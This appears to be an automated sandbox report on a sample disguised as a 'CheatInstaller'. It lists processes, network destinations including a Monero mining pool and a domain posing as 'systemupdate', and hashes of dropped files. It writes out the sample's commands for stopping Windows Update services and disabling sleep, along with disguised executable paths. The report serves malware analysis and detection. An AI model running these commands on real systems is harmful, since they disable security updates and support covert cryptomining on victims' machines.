ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\timeout.exe

timeout /t 10 /nobreak

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20b59d50-3445-4b6f-ab5a-84867f16d43e.vbs"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\76cf097d-0b3c-467e-8e9d-a2b53fd0cfe9.vbs"

Network

Country Destination Domain Proto
US 185.199.108.133:443 raw.githubusercontent.com tcp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 systemupdate.cfd udp
NL 23.137.248.138:443 systemupdate.cfd tcp
NL 23.137.248.138:443 systemupdate.cfd tcp
US 8.8.8.8:53 138.248.137.23.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\es2015\text.js

MD5 12148d2dff9ca3478e4467945663fa70
SHA1 50998482c521255af2760ed95bbdb1c4f7387212
SHA256 1fb82c82d847ebc4aa287f481ff67c8cc9bde03149987b2d43eb0dee2a5160b6
SHA512 f9f6a61af37d1924e3a9785aa04a33fa0107791d54cb07663c6ea8a68edfae3766682e914b6afaf198eb97c7f73ab53aa500b4661cdabdebd2576526664166f4

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\text.js

MD5 7b33dd38c0c08bf185f5480efdf9ab90
SHA1 b3d9d61ad3ab1f87712280265df367eff502ef8b
SHA256 d1e41c11aa11e125105d14c95d05e1e1acd3bede89429d3a1c12a71450318f88
SHA512 22da641c396f9972b136d4a18eb0747747252cf7d5d89f619a928c5475d79375fbbe42d4e91821102e271ea144f89267ff307cd46494fdf7d6002ce9768b7bd9

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\@isaacs\cliui\node_modules\strip-ansi\license

MD5 d5f2a6dd0192dcc7c833e50bb9017337
SHA1 80674912e3033be358331910ba27d5812369c2fc
SHA256 5c932d88256b4ab958f64a856fa48e8bd1f55bc1d96b8149c65689e0c61789d3
SHA512 d1f336ff272bc6b96dc9a04a7d0ef8f02936dd594f514060340478ee575fe01d55fc7a174df5814a4faf72c8462b012998eca7bb898e3f9a3e87205fb9135af2

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\@npmcli\query\LICENSE

MD5 c637d431ac5faadb34aff5fbd6985239
SHA1 0e28fd386ce58d4a8fcbf3561ddaacd630bc9181
SHA256 27d998b503b18cdb16c49e93da04069a99ba8a1d7e18d67146de8e242f9a6d21
SHA512 a4b744c1d494fcc55cd223c8b7b0ad53f3637aac05fe5c9a2be41c5f5e117610c75a323c7745dfeae0db4126f169c2b7b88649412b6044ba4a94e9a4d8d62535

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\@npmcli\run-script\LICENSE

MD5 89966567781ee3dc29aeca2d18a59501
SHA1 a6d614386e4974eef58b014810f00d4ed1881575
SHA256 898c2bcff663681498ad1ca8235d45b6e70b10cdf1f869a5b5e69f6e46efedd3
SHA512 602dd09be2544542a46083e71a6e43fefc99eb884bdd705f629f8b4bf49192c6f8c482cd6a490397afde100be9347524079abb4c6d18bda3f64cf2fb77d2fe4c

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\@sigstore\sign\dist\types\fetch.js

MD5 8963201168a2449f79025884824955f2
SHA1 b66edae489b6e4147ce7e1ec65a107e297219771
SHA256 d43aa81f5bc89faa359e0f97c814ba25155591ff078fbb9bfd40f8c7c9683230
SHA512 7f65c6403a23d93fb148e8259b012d6552ab3bff178f4a7d6a9d9cec0f60429fc1899e39b4bca8cc08afc75d9a7c7bfdb13fc372ca63c85eb22b0355eb4d6000

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\@sigstore\sign\LICENSE

MD5 f03382535cd50de5e9294254cd26acba
SHA1 d3d4d2a95ecb3ad46be7910b056f936a20fefacf
SHA256 364a130d2ca340bd56eb1e6d045fc6929bb0f9d0aa018f2c1949b29517e1cdd0
SHA512 bbbbee42189d3427921409284615e31346bdbd970a6939bc1fe7f8eaed1903d9ad0534ddf7283347d406fa439d8559fbf95c6755ece82e684e456fce2b227016

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\ansi-styles\license

MD5 915042b5df33c31a6db2b37eadaa00e3
SHA1 5aaf48196ddd4d007a3067aa7f30303ca8e4b29c
SHA256 48da2f39e100d4085767e94966b43f4fa95ff6a0698fba57ed460914e35f94a0
SHA512 9c8b2def76ae5ffe4d636166bf9635d7abd69cdac4bf819a2145f7969646d39ae95c96364bc117f9fa544b98518c294233455d4f665af430c75d70798dd4ab13

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\cross-spawn\node_modules\which\LICENSE

MD5 82703a69f6d7411dde679954c2fd9dca
SHA1 bb408e929caeb1731945b2ba54bc337edb87cc66
SHA256 4ec3d4c66cd87f5c8d8ad911b10f99bf27cb00cdfcff82621956e379186b016b
SHA512 3fa748e59fb3af0c5293530844faa9606d9271836489d2c8013417779d10cc180187f5e670477f9ec77d341e0ef64eab7dcfb876c6390f027bc6f869a12d0f46

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\emoji-regex\LICENSE-MIT.txt

MD5 ee9bd8b835cfcd512dd644540dd96987
SHA1 d7384cd3ed0c9614f87dde0f86568017f369814c
SHA256 483acb265f182907d1caf6cff9c16c96f31325ed23792832cc5d8b12d5f88c8a
SHA512 7d6b44bb658625281b48194e5a3d3a07452bea1f256506dd16f7a21941ef3f0d259e1bcd0cc6202642bf1fd129bc187e6a3921d382d568d312bd83f3023979a0

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\inflight\LICENSE

MD5 90a3ca01a5efed8b813a81c6c8fa2e63
SHA1 515ec4469197395143dd4bfe9b1bc4e0d9b6b12a
SHA256 05dc4d785ac3a488676d3ed10e901b75ad89dafcc63f8e66610fd4a39cc5c7e8
SHA512 c9d6162bef9880a5ab6a5afe96f3ec1bd9dead758ca427f9ba2e8e9d9adaaf5649aad942f698f39b7a9a437984f8dc09141f3834cd78b03104f81ad908d15b31

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\minimatch\dist\cjs\package.json

MD5 df9ffc6aa3f78a5491736d441c4258a8
SHA1 9d0d83ae5d399d96b36d228e614a575fc209d488
SHA256 8005a3491db7d92f36ac66369861589f9c47123d3a7c71e643fc2c06168cd45a
SHA512 6c58939da58f9b716293a8328f7a3649b6e242bf235fae00055a0cc79fb2788e4a99dfaa422e0cfadbe84e0d5e33b836f68627e6a409654877edc443b94d04c4

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\minimatch\dist\mjs\package.json

MD5 d0707362e90f00edd12435e9d3b9d71c
SHA1 50faeb965b15dfc6854cb1235b06dbb5e79148d2
SHA256 3ca9d4afd21425087cf31893b8f9f63c81b0b8408db5e343ca76e5f8aa26ab9a
SHA512 9d323420cc63c6bee79dcc5db5f0f18f6b8e073daaf8ffa5459e11f2de59a9f5e8c178d77fa92afc9ddd352623dec362c62fff859c71a2fab93f1e2172c4987f

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\minipass\dist\esm\package.json

MD5 6138da8f9bd4f861c6157689d96b6d64
SHA1 ee2833a41c28830d75b2f3327075286c915ed0dd
SHA256 6dc1b06d6b093e9cccb20bee06a93836eee0420ae26803ca2ce4065d82f070d1
SHA512 0a3f1cb1522c6e7595186a9a54ed073ffa590b26c7d31b0877f19c925f847037e9f972066bfed62609b190eb2bc21ff7b31514e08c3de64780fef5982cbb21f2

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\minipass\dist\commonjs\package.json

MD5 95b08bc3062cdc4b0334fa9be037e557
SHA1 a6e024bc66f013d9565542250aef50091391801d
SHA256 fa6944a20ca5e6fbaf98fd202eb8c7004d5b4ab786e36b9ed02ee31dbe196c9f
SHA512 65c66458abe2101032cdd1b50ca6e643e0c368d09dfa6cc7006b33ed815e106bb20f9aff118181807e7df9f5d4d8d9796709b1ec9a7e04544231636fdf8fdf42

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\minipass-json-stream\node_modules\minipass\package.json

MD5 1943a368b7d61cc3792a307ec725c808
SHA1 fc79b496665e2cdfc4bdaac9c7d7c4b2f4645f2c
SHA256 e99f6b67ba6e5cda438efb7a23dd399ee5c2070af69ce77720d95de5fb42921e
SHA512 7c05f03f5d3db01798c56c50d21628fc677097630aacf92e9ea47e70ff872d0e4e40217c1c2d5e81fc833ccf5afe9697f8f20a4772459b396aa5c85263289223

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\minipass-json-stream\node_modules\minipass\LICENSE

MD5 78e0c554693f15c5d2e74a90dfef3816
SHA1 58823ce936d14f068797501b1174d8ea9e51e9fe
SHA256 a5a110eb524bf3217958e405b5e3411277e915a2f5902c330348877000337e53
SHA512 b38ebcf2af28488dbf1d3aa6a40f41a8af4893ad6cb8629125e41b2d52c6d501283d882f750fc8323517c4eb3953d89fa0f3c8ceba2ae66a8bf95ae676474f09

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\minipass-json-stream\node_modules\minipass\index.js

MD5 a8c344ac3d111b646df0dcae1f2bc3a3
SHA1 d8a136b49214e498da9c5a6e8cb9681b4fda3149
SHA256 dbc5220c4bc8b470da9c8e561b6a5382cf3fa9dcd97cace955ac6fd34a27970c
SHA512 523749e4d38585249f1e3d7cfb2cb23e7f76764b36d0a628f48ff6b50f0a08c8e8526a1236977da1bd4ac0ff0bd8d0ba9b834324f2bdef9bea9394dd6878c51d

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\node-gyp\node_modules\are-we-there-yet\LICENSE.md

MD5 1750b360daee1aa920366e344c1b0c57
SHA1 fe739dc1a14a033680b3a404df26e98cca0b3ccf
SHA256 7f75bb21103e77b7acfcf88a6ad0286741a18b5d13c4326160346e8cf7e356ad
SHA512 ff2486d589d32fb35aad9c02cd917ba1e738ca16b7ccc7954cdc4712a968fc5fc25612b489f962cbe8ddb2be40057cd1b59402aa9cade9b6479a1d0e1d7743a4

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\node-gyp\node_modules\cacache\node_modules\brace-expansion\LICENSE

MD5 a5df515ef062cc3affd8c0ae59c059ec
SHA1 433c2b9c71bad0957f4831068c2f5d973cef98a9
SHA256 68f12f6e2c33688699249c01d8f9623c534da20aa71989c57b061b7bc1676d14
SHA512 0b0068b8beb6864dbb6971d9fe165d2d5fd420bcd6d7bbbd8f42589eb981bf95d854df2d16c21d378ea6d48f562345d2f66de0fd17134dffa8495eb496e6dff0

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\node-gyp\node_modules\minipass\LICENSE

MD5 5f114ac709a085d123e16c1e6363793f
SHA1 185c2ab72f55bf0a69f28b19ac3849c0ca0d9705
SHA256 833faa18ac4b83a6372c05b3643d0d44ecd27d6627b8cd19b0f48fe74260cf39
SHA512 cab00a78e63dec76fa124fc49d1c28962d674fa18dda5fdf2819078bd932f1bf0cc9abd741b78f62869b4809473099f85ba8a622bc96f4ee92cf11b564346597

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\npm-audit-report\LICENSE

MD5 5324d196a847002a5d476185a59cf238
SHA1 dfe418dc288edb0a4bb66af2ad88bd838c55e136
SHA256 720836c9bdad386485a492ab41fe08007ecf85ca278ddd8f9333494dcac4949d
SHA512 1b4187c58bebb6378f8a04300da6f4d1f12f6fbe9a1ab7ceda8a4752e263f282daebcac1379fa0675dd78ec86fffb127dba6469f303570b9f21860454df2203f

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\read-package-json-fast\LICENSE

MD5 ff53df3ad94e5c618e230ab49ce310fa
SHA1 a0296af210b0f3dc0016cb0ceee446ea4b2de70b
SHA256 ec361617c0473d39347b020eaa6dceedaebab43879fa1cd8b8f0f97a8e80a475
SHA512 876b0bd6a10f852661818d5048543bb37389887bf721016b6b7d1fa6d59d230d06f8ff68a59a59f03c25fbc80a2cbb210e7ca8179f111ecd10929b25b3d5cdfe

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\text-table\LICENSE

MD5 aea1cde69645f4b99be4ff7ca9abcce1
SHA1 b2e68ce937c1f851926f7e10280cc93221d4f53c
SHA256 435a6722c786b0a56fbe7387028f1d9d3f3a2d0fb615bb8fee118727c3f59b7b
SHA512 518113037ee03540caae63058a98525f9a4a67425bd8c3596f697bed5ae1d2053fe76f76b85a4eefb80cc519f7b03d368cf4b445288c4ca7cacb5e7523f33962

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\tuf-js\LICENSE

MD5 391090fcdb3d37fb9f9d1c1d0dc55912
SHA1 138f23e4cc3bb584d7633218bcc2a773a6bbea59
SHA256 564bcb001d6e131452a8e9fba0f0ccc59e8b881f84ce3e46e319a5a33e191e10
SHA512 070121c80cd92001196fb15efb152188c47fdc589b8f33b9da5881aa9470546b82cb8a8ea96fe1073723f47149e184f1a96c2777a9fc9b45af618c08464d6c5e

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\node_modules\wide-align\LICENSE

MD5 9d215c9223fbef14a4642cc450e7ed4b
SHA1 279f47bedbc7bb9520c5f26216b2323e8f0e728e
SHA256 0cef05dfff8b6aa7f35596984f5709f0d17c2582924a751efa471a76de7cdc11
SHA512 5e4ba806f279089d705e909e3c000674c4186d618d6ab381619099f8895af02979f3fc9abb43f78b9ffed33b90a7861f6c4b9d6c1bb47ed14a79e7f90eca833c

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe

MD5 e19b7e1872d779f666066afdb55dd069
SHA1 9017d9a123e773bff95c5d84f8125adf91271166
SHA256 a4516a18835300cc5fd7d62b46d8e36cfd7f8d2a39e4b72c748df1b3f12b32ac
SHA512 6fe8e074b9cc7213fcdbc07c92b1aa1aa2fcc5becca9fdca2bf5811ab9f14ad4a882afe89689c3f24ebc7a69e719b06f5e07ebc0c75b903261e9cef61307d4fa

C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install_YTTCHTs.exe

MD5 be3e513265214437670cbf108792f54d
SHA1 b3a8dff1b792fa155d3ad63bff29ddd1a537dd1c
SHA256 80d91768b9136daec8be28fac2eee0de7228025e659585af328077317bf0de03
SHA512 eb6585b219a498d41ab699f64ef6c95e26e50cc36ef473701ec90099e2b29415bbd11aa4a6853fe5a4bd1b13c032e2314589793ae42abcc8f23b61d2abd3fa59

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 88d6ef66043282511d78477c3457cd05
SHA1 dedf2529b0f78f9d7dfe5519d080fe1d11fb0344
SHA256 82efcbda4a568f2e898f2c97d3876af8c4c42f2638a339b937b01202bb83fb4a
SHA512 506e03b18e11c6133eb4b997bfd017ab5e5ed7a253e0470ee391d8bf5f86196742b57ec03316f1d5699f7a2f556df38468c539a6ff70c52e092bf0c1de61fa2b

C:\Users\Admin\AppData\Local\Temp\MSI7FDF.tmp

MD5 1db319e363889aaed43f9d4560421a1d
SHA1 e6e9122b9030b0e80e27f63f01314f2c0aac96b8
SHA256 44746f35adf6d5350d6accb415a9d1a97a82055d05ff708bd985618452d97386
SHA512 988051d06b01246296c9306f0e6c8a71e7106b2ad0d80ede155922dc9af6dfc5750d7f183263bbe902840d7af7b24aa44b7844dfe3af1f84671bbcb32d75442c

C:\Users\Admin\AppData\Local\Temp\MSI80FB.tmp

MD5 c9c085c00bc24802f066e5412defcf50
SHA1 557f02469f3f236097d015327d7ca77260e2aecc
SHA256 a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24
SHA512 a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 3e7bcb11d2173457d34fed2af1b83a93
SHA1 dcf8d6833aade55c08ec44904f47bd8b2c6c2673
SHA256 b3e0c3f6e75222ffa9b274581ceed7a01370f3cf3ff0b31054f524e81b265bbc
SHA512 ebdfa883673a7b2dae38080474c13e48bf07f1c15426c08b8b37fe591a67f343e6a3cd3badbd30ce8b578f1227a81851a89eca3aefe3fd66e11b40bba4f02106

C:\Users\Admin\AppData\Local\Temp\MSI80EB.tmp

MD5 6bb65410717bb2c62ed92cdbc9c41652
SHA1 1f0d56a24588c0c07e878f348df6bb0c3e4f693a
SHA256 91a6c5daebe89b7d9157188a2b3fa8e47d53b4d20c29bcc244635d1943397f7b
SHA512 1a864c6d010e3d62337a2067f53e82067ab01a556edee65036658bb7dd863bf22379d16aaf6385fda23060148c68c7225610058a153420e7b125c038285ceb38

C:\Windows\Installer\MSI8283.tmp

MD5 a8338e7b3ce49ab7e793952765ac998f
SHA1 29a2dd67eba553530f84f9e02266474ea678abdd
SHA256 6fa584e22fc546b95fa757279ce5569e5540bf2ac28b138adba41877fe0c645d
SHA512 85c5095099f7a689e5dd125ad8805b90f59a0e4a930ea791383a596e722d56fa62e4f85c28365c01a6ef2c3b4ddd0e53eb6a70777ad94070b49602993497a64f

memory/4464-3591-0x0000013F6E910000-0x0000013F6E932000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pwj2rmzw.0no.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4464-3593-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pss82CF.ps1

MD5 a8a3a992fce81410c5771c10f743f6ba
SHA1 d0dd0c52514afa2150b250e549dfebf87758f191
SHA256 bd580ea3519d7b9c2bc34d30b66af13f580ee5beb1ce828499f607300dbd9bee
SHA512 3edf26ba7095e2532cd0257f50a65c9f71eb85b768f27237f0bf538409cea74e12bbcec01bc0120f9d53bfb6a94b4bac21a17595e259ee23d1a36fbf4615c830

memory/4464-3595-0x0000013F6E900000-0x0000013F6E910000-memory.dmp

memory/4464-3596-0x0000013F6E900000-0x0000013F6E910000-memory.dmp

memory/4464-3594-0x0000013F6E900000-0x0000013F6E910000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scr82CE.txt

MD5 64d1817b6bfcd6cfda309f8910f51b57
SHA1 9faf2d4a707b789de6970b53b0dc80ac47ec3c52
SHA256 067838889a9eeb91ecb3fc155f3bfed21bd86d8c789d6485cca2a6d6a6bd4391
SHA512 d51ec763f8f2920782d958c84a5fb96d7e80382d88bc9a41ec0ca6e2570ebb328389ead37e4042c83d025a1e3580444f6374ffa015374d6c20c75f9ec85ba7ee

C:\Users\Admin\AppData\Local\Temp\scr82CD.ps1

MD5 b4aaf8eaa1aa2477670ed54128e2c742
SHA1 b756fb677993bcf92916be8979052ed14a6170da
SHA256 5a4a897b8e922880f81b7ad94877acf3b394fffc1811d8826035b33d383624ba
SHA512 078503e1424578aa7a6791d1c962b801c1066958851d04ec4b8e24fc4ac5eecb4c013dc8484d04b5a5177a8bded08ba743f98ac69c656f7b79039fc8d1d7c55f

C:\Users\Admin\AppData\Local\Temp\progressbad.bat

MD5 ab5f71bb2f51f8b6f130b2be083a382a
SHA1 92db0caad0b9c3ab6b8be29c7ffa3ed3f8d09d72
SHA256 7b4e523830cac46dd364741550f660887727368aeb4842e18eebe390dc0bc874
SHA512 3b09e569527892be9a47a659beb58b237ff5e0a92640dd8ea7fc321c83ef9693f6d72dda0df89a12ebd735099b40f46274c8e0a86d23ae4f87f0769f2f6914c1

C:\Users\Admin\AppData\Local\Temp\progressgood.bat

MD5 845cf6630a4a8d184f93d0f732feb846
SHA1 1d9219177aaf25e5a95bdc72ec8cd6fd42e6cace
SHA256 19f3274b5b004259d609e624e54259d1637074a97ab7e6452ddd2bd81ee29153
SHA512 bb6e45187eb464ba6eec05c368ea13c43667307804b10215b5753209fb8d1cdacf0b1fb3460849069211ac76b8706c772f85704b7b7361626798cce373bdac1e

memory/4464-3667-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

C:\Windows\Installer\MSI85E1.tmp

MD5 2557173f4299722afce46cc3c0616406
SHA1 b0343c9a9552be977834e415783b486c4714fe97
SHA256 e25369e33c7ef36151769a86d833189b275f85045f35873e9e931547e0a6d591
SHA512 24a46359cb8e22534cbd875fe092d096e3280ca4c24936159894ba95832233ee318494a3eabbdf73ae6010e39a1b5897b4488b2771b416b472bb7f60ceddf40e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_sc09.wav

MD5 2ed8d4d8383a008576d697c0d0a1964f
SHA1 891cc6a6ceee3ce08ed97da5e31431e906869270
SHA256 3cb011ea19368ad7f39216659fde066c1b1cc4b3ee891066dddad547bb2a48eb
SHA512 6d71e5318e7d84d5fab88ea2a47c809f80c0be02eae43991d377cb3761f87c22be56ecb91e270776306defaf228a5a894628222ab9ee55be22c3f21ccc1d924d

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_pp.wav

MD5 37743c96f61d7ad0167513933cde068c
SHA1 065e0702ed560ba9bca9a3482929925b98d6d22c
SHA256 a2b19e0774d27897123a53093b9d2584bd0cb963fc9ac08a05145bf085808824
SHA512 603a98e7d12e7f29c9cb9882dd9ffc6bcbd9c4f1880b53639bd46e89b58927bbae6c660f6483186fe93c939b02554c0c64eae00d86f5d521a8a86ba2bcbaa2fd

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\event.csv

MD5 2620f56f03159589486b831d9b6adc4a
SHA1 55dfc135be75692bd64c50b429dcd5460e0b0b90
SHA256 8438f31c41c8214d92ef0227b0e45eae937e6e5221e410af1ad3735dc9e2ee71
SHA512 2915b402391b79635679f415c085646fa3fa6a888b4d00ee9be8aac101760815df6dd390b76192c5d695a116dfd2d297a1e3323b678b184e320049061b974f01

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\OneDriveUpdate.vbs

MD5 214ee30dbd649af9294f254fc8c33d07
SHA1 e81a7486c5c19868abb7d39fc757f686c4124662
SHA256 d9747024f7951c01c90b39e18ebe0a490a956625422f165d53f917ae062c4e52
SHA512 f1309c116fcaa64b372946686c3a22b0574db717aef91c095fbb70cbeb4125077f363ad9ce0d4a9ec12bc9f61d61df8ef35f5ac20a6a8b9f68b95203b5f93d19

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\lang_fre.txt

MD5 5b1a12edc7b4e82163e5b39694e5b630
SHA1 088d6df18ce940cf01789a27adeaa150f9dc26b7
SHA256 206bac7b50b6bd8467ccffcb6d0833c4c8c58a2e82d205f608d4127ddc3402c9
SHA512 07846ad52962fc7f07b9e950343f906db5ac09287ced6d4659dae5f99f3fc8ee02916d66557dc2a0a7edbca0a716d8b26c252642558417986532cc28428494cc

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_timit.wav

MD5 2b45823b9d2ec23f45a8ad4f4f73f16d
SHA1 58adb15c9357ce64e4e1669243b6874d2ed421fc
SHA256 dc7acdd50bd36ede972b9ed9add1eaee71c704cb34c3d805886e56aded57e80f
SHA512 752a30fe95ebffb2ce7e7d0147cb6fc8ab9ba06ba1615324b0df4a8b0c33c838e969545d6a5e12c4f38682baa6cdc30de158b9f36ae3282741e368f973568cba

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_tatum.wav

MD5 2e344a0a28422fec1d83e4466482b1ea
SHA1 15afded79813a88efb271b79f60d2008ae69d104
SHA256 35c025b79b3f1c65c112048e1b8515c9b38ba27cb45492885ebbbed25a021af5
SHA512 c518f4f0ed8ef51e5ee5f4a6a94ba91ae41c76e93a9f525514abcfcddde65ddabaa1370f546f61302d6421c38a761b4e903948ad415b397b5bfcdd425e028d4f

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_piano.wav

MD5 4003f2688182bbb8e349271627f18190
SHA1 4d9c650b6396d7a2117a0fa8c88039d735ae24e3
SHA256 954250bc1fadc531e71193e886a3f0c734d7b8c35156aaac5967a88c849bd21b
SHA512 620e8583de83944f1f16c7ceb93ac8855112493d4b850ada24c66131caa1283586ea9820988f566bb2d71bafe197dabe710f6462ae68f65df3d136e7dc5a2658

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_drums.wav

MD5 a19e71af7a2b96dbe8d7ecb650321bc6
SHA1 e6bfb029b478443cb297c8fa074deab9fc404be9
SHA256 1db9ed680aaed1b9aa76ddd2cfb50308e71d51e34fb6eca7c6a45d078fa854ad
SHA512 806723bb0374b1c2c62e2a3d34d9e499aef4e38a553a91d8095f20910b9b2debfdc201fcecdc904ed08f78412dece4ef80877df1354964f361dfe00e1939b0a3

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_timit.wav

MD5 2c50fa8d8ddb873502db499155963d7f
SHA1 d270002bb30c31bd126bf383fb1970b62f173c0b
SHA256 24cba0f91cfe37a447678fa16a9082ceeae9ed1aaa624ab57a76513df3f332f3
SHA512 4e8e78456b88c5710434690b6f8864b7d497be243ad4ec3c4eaf273c8e540d2dd9c5710f6cf0b7ae58c56aa4b29061d9f9ae02e66e37dddc1bcd84ddbdb197f5

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_parametric.wav

MD5 d799ed4a2538bb12648eeb4482a76138
SHA1 d11e28c3309f4b297d473751fbc91fb47c951bae
SHA256 06396832ffd8c0615ef08a275ffa4a2548f5a91958ae7d421738c98f255f188e
SHA512 408abf1b5aefea000adb6d506101fd2b5c186088638933739a12d906e378fc7c120bdc25c202ce2e7cfadff5c381877e8478a4aa5af2fb321048f091f7605232
